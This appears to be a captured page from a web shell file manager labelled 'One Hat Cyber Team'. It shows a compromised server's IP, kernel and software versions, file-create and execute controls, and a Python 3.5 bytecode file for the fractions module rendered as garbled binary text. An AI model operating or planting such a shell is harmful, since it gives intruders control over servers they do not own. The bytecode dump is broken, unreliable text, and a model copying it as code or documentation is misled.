⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.144
Server IP:
157.245.143.252
Server:
Linux www 6.11.0-9-generic #9-Ubuntu SMP PREEMPT_DYNAMIC Mon Oct 14 13:19:59 UTC 2024 x86_64
Server Software:
nginx/1.26.0
PHP Version:
8.3.11
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
snap
/
core
/
current
/
usr
/
lib
/
python3.5
/
__pycache__
/
View File Name :
fractions.cpython-35.pyc
|gF_ @ s d Z d d l m Z d d l Z d d l Z d d l Z d d l Z d d l Z d d g Z d d Z d d Z e j j Z e j j Z e j d e j e j B Z Gd d d e j Z d S)z+Fraction, infinite-precision, real numbers. )DecimalNFractiongcdc C s d d l } | j d t d t | t k oB t | k n rz | pP | d k rj t j | | St j | | St | | S)zCalculate the Greatest Common Divisor of a and b. Unless b==0, the result will have the same sign as b (so that when b is divided by it, the result comes out positive). r Nz6fractions.gcd() is deprecated. Use math.gcd() instead. )warningswarnDeprecationWarningtypeintmathr _gcd)abr r /usr/lib/python3.5/fractions.pyr s (c C s" x | r | | | } } q W| S)Nr )r r r r r r s r aC \A\s* # optional whitespace at the start, then (?P
[-+]?) # an optional sign, then (?=\d|\.\d) # lookahead for digit or .digit (?P
\d*) # numerator (possibly empty) (?: # followed by (?:/(?P
\d+))? # an optional denominator | # or (?:\.(?P
\d*))? # an optional fractional part (?:E(?P
[-+]?\d+))? # and optional exponent ) \s*\Z # and optional whitespace to finish c se e Z d Z d Z dR Z d d d f d d Z e d d Z e d d Z d d d Z e d d Z e d d Z d d Z d d Z d d Z d d Z e e e j \ Z Z d d Z e e e j \ Z Z d d Z e e e j \ Z Z d d! Z e e e j \ Z Z d" d# Z! d$ d% Z" d&